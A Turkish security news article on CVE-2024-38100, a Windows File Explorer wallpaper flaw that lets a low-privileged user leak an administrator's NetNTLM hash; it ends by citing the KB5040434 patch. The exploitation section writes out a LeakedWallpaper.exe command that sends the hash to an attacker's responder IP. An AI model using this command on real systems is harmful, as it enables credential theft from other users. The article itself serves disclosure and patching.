Windows Dosya Gezgini’nde yeni keşfedilen bir güvenlik açığı, siber güvenlik camiasında alarma neden oldu.
CVE-2024-38100 olarak tanımlanan bu güvenlik açığı, saldırganların görünüşte zararsız bir duvar kağıdı özelliğini kullanarak ayrıcalıkları artırmasına olanak tanıyor.
CVE-2024-38100 – Windows Dosya Gezgini Ayrıcalık Yükseltme Güvenlik Açığı
9 Temmuz 2024’te yayımlanan CVE-2024-38100, Microsoft’un “Önemli” bir güvenlik sorunu olarak sınıflandırdığı kritik bir güvenlik açığıdır.
Uygunsuz Erişim Kontrolü için CWE-284 kapsamında takip edilen açığın CVSS puanı 7.8/6.8 olup, etkilenen sistemler için önemli bir risk olduğunu gösteriyor.
İstismar
Güvenlik açığı, bilgisayardaki herhangi bir oturumdan, hatta düşük ayrıcalıklı bir kullanıcı hesabından bile bir kullanıcının NetNTLM özetinin sızdırılabilmesi yeteneği etrafında dönüyor.
“LeakedWallpaper.exe” adlı exploit aracı aşağıdaki komutla çalıştırılabilir:
.\SızdırılmışDuvarKağıdı.exe
Örneğin:
.\LeakedWallpaper.exe 1 \\172.16.0.5\c$\1.jpg
Bu komut belirli bir oturum kimliğini hedef alır ve bir saldırganın düşük ayrıcalıklı bir oturumdan yönetici gibi ayrıcalıklı bir hesabın NetNTLM karma değerini ele geçirmesine olanak tanır.
Saldırgan, düşük ayrıcalıklı bir hesaptan (“istismar”) faaliyet gösterir ve NetNTLM karmasını elde etmek için ayrıcalıklı bir hesabı (“yönetici”) hedefler.
Saldırganın makinesi (Cevaplayan IP: 172.16.0.5), istismarı gerçekleştirmek için kurbanın makinesiyle (Windows IP: 172.16.0.2) iletişim kurar.
Microsoft bu güvenlik açığını KB5040434 güncelleştirmesinde ele aldı. Kullanıcılara ve yöneticilere sistemlerini olası saldırılardan korumak için bu güncelleştirmeyi derhal uygulamaları şiddetle tavsiye edilir.
CVE-2024-38100, siber güvenliğin sağlanmasında sürekli teyakkuz ve zamanında güncellemelerin önemini vurgular.
Saldırganlar en sıradan özellikleri bile istismar etmenin yenilikçi yollarını buldukça, kullanıcıların dijital ortamlarını koruma konusunda bilgili ve proaktif olmaları gerekiyor.
Bu güvenlik açığı ve bunun azaltılması hakkında daha fazla bilgi edinmek için resmi Microsoft güvenlik danışma sayfasını ziyaret edin.
Are you from SOC and DFIR Teams? – Analyse Malware Incidents & get live Access with ANY.RUN -> Free Access